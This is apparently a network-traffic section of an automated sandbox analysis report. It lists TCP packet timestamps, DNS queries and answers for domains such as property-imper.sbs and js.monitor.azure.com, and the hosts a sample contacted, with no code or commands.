                                                                                                                                                                                  Nov 23, 2024 19:54:15.204154015 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.204174995 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.204371929 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.204552889 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.204560041 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.640059948 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.643773079 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.644507885 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.644535065 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.645193100 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.645200014 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.645503044 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.645520926 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.645997047 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.646003962 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.690131903 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.691117048 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.691184998 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.691694975 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.691709995 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.093142986 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.093286991 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096292973 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096321106 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096406937 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096443892 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096476078 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096479893 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096486092 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096503973 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096527100 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.096533060 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.097899914 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.097923994 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.097935915 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.097942114 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.100867033 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.100894928 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.101902962 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.101942062 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.101959944 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.102292061 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.102308035 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.102318048 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.102438927 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.102456093 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.162148952 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165105104 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165148020 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165213108 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165282011 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165565014 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165615082 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165652990 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.165669918 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.168523073 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.168576002 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.168657064 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.168787003 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.168802023 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.262239933 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.262979031 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.262991905 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.263545990 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.263550997 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.720545053 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.720685005 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.720824957 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.720999002 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.720999002 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.721014977 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.721023083 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.724045038 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.724102974 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:16.724251032 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.724436045 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:16.724452019 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.055757046 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.056408882 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.056422949 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.057313919 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.057317972 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.527076006 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528045893 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528093100 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528103113 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528146982 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528188944 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528234959 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528253078 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528263092 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.528268099 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.532036066 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.532078981 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.532144070 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.532289028 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.532295942 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.865880966 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.868617058 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.868643045 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.869102955 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.869111061 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.955698013 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.956218004 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.956247091 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.956933975 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.956952095 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.984154940 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.989276886 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.989289045 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:17.989888906 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:17.989895105 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.360260963 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.363270998 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.363343000 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.363396883 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.363414049 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.363428116 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.363435030 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.366451025 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.366487026 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.366549969 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.366698027 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.366710901 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.449094057 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.452151060 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.452296972 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.452569962 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.452569962 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.452584028 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.452593088 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.454794884 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.454823971 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.454895973 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.455037117 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.455053091 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.524619102 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.524776936 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.525060892 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.525089025 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.525449038 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.525456905 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.527861118 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.527918100 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.527960062 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.527960062 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.527983904 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.528001070 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.530138969 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.530168056 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.530240059 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.530359030 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.530376911 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.971398115 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.974915981 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.974961042 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.974963903 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.975006104 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.975045919 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.975066900 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.975079060 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.975086927 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.978450060 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.978487968 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:18.978568077 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.978708982 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:18.978719950 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.267023087 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.267566919 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.267605066 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.268254995 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.268269062 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.711250067 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.712677956 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.712729931 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.712786913 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.712806940 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.712824106 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.712833881 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.716465950 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.716516972 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:19.716587067 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.716857910 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:19.716872931 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 23, 2024 19:52:15.700229883 CET6189153192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:52:16.038357019 CET53618911.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:18.389189959 CET123123192.168.2.740.81.94.65
                                                                                                                                                                                  Nov 23, 2024 19:52:19.797811031 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.698091984 CET53540841.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.698210001 CET53640511.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.094731092 CET53627651.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.818825960 CET5816353192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:52:59.818979025 CET5767053192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:52:59.964474916 CET53576701.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.964508057 CET53581631.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.001049995 CET5076653192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:53:03.001224995 CET5339653192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:53:11.446264029 CET5200853192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:53:11.446480989 CET6110753192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:53:12.514014959 CET138138192.168.2.7192.168.2.255
                                                                                                                                                                                  Nov 23, 2024 19:53:14.435666084 CET53546081.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:15.312114954 CET5903453192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:53:15.312283993 CET6436153192.168.2.71.1.1.1
                                                                                                                                                                                  Nov 23, 2024 19:53:16.221729994 CET53587461.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:34.982383013 CET53516701.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:55.258383036 CET53510021.1.1.1192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:57.459367037 CET53645731.1.1.1192.168.2.7
                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                  Nov 23, 2024 19:53:11.722044945 CET192.168.2.71.1.1.1c2c4(Port unreachable)Destination Unreachable
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 23, 2024 19:52:15.700229883 CET192.168.2.71.1.1.10x455Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:52:59.818825960 CET192.168.2.71.1.1.10xcbaeStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:52:59.818979025 CET192.168.2.71.1.1.10x8678Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.001049995 CET192.168.2.71.1.1.10x89b3Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.001224995 CET192.168.2.71.1.1.10x6131Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.446264029 CET192.168.2.71.1.1.10x2ac2Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.446480989 CET192.168.2.71.1.1.10x4ad2Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:15.312114954 CET192.168.2.71.1.1.10x3e29Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:15.312283993 CET192.168.2.71.1.1.10x2ebdStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Nov 23, 2024 19:52:16.038357019 CET1.1.1.1192.168.2.70x455No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:52:16.038357019 CET1.1.1.1192.168.2.70x455No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:52:59.964474916 CET1.1.1.1192.168.2.70x8678No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:52:59.964508057 CET1.1.1.1192.168.2.70xcbaeNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.155628920 CET1.1.1.1192.168.2.70x89b3No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.155628920 CET1.1.1.1192.168.2.70x89b3No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.155628920 CET1.1.1.1192.168.2.70x89b3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.155628920 CET1.1.1.1192.168.2.70x89b3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.155741930 CET1.1.1.1192.168.2.70x6131No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.155741930 CET1.1.1.1192.168.2.70x6131No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.163764000 CET1.1.1.1192.168.2.70xc6ceNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.163764000 CET1.1.1.1192.168.2.70xc6ceNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:03.163764000 CET1.1.1.1192.168.2.70xc6ceNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:06.086446047 CET1.1.1.1192.168.2.70x238dNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:06.086446047 CET1.1.1.1192.168.2.70x238dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:06.086446047 CET1.1.1.1192.168.2.70x238dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:06.090717077 CET1.1.1.1192.168.2.70x59ffNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.603367090 CET1.1.1.1192.168.2.70x2ac2No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.603367090 CET1.1.1.1192.168.2.70x2ac2No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.603367090 CET1.1.1.1192.168.2.70x2ac2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.603367090 CET1.1.1.1192.168.2.70x2ac2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.721975088 CET1.1.1.1192.168.2.70x4ad2No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:11.721975088 CET1.1.1.1192.168.2.70x4ad2No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:15.548679113 CET1.1.1.1192.168.2.70x2ebdNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:15.654594898 CET1.1.1.1192.168.2.70x3e29No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:23.262922049 CET1.1.1.1192.168.2.70xa029No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:23.264368057 CET1.1.1.1192.168.2.70x81adNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:30.263612032 CET1.1.1.1192.168.2.70xe9d7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Nov 23, 2024 19:53:30.264417887 CET1.1.1.1192.168.2.70xe4b7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  • property-imper.sbs
                                                                                                                                                                                  • otelrules.azureedge.net
                                                                                                                                                                                  • slscr.update.microsoft.com
                                                                                                                                                                                  • fs.microsoft.com
                                                                                                                                                                                  • https:
                                                                                                                                                                                    • js.monitor.azure.com
                                                                                                                                                                                    • wcpstatic.microsoft.com
                                                                                                                                                                                  • 185.215.113.16
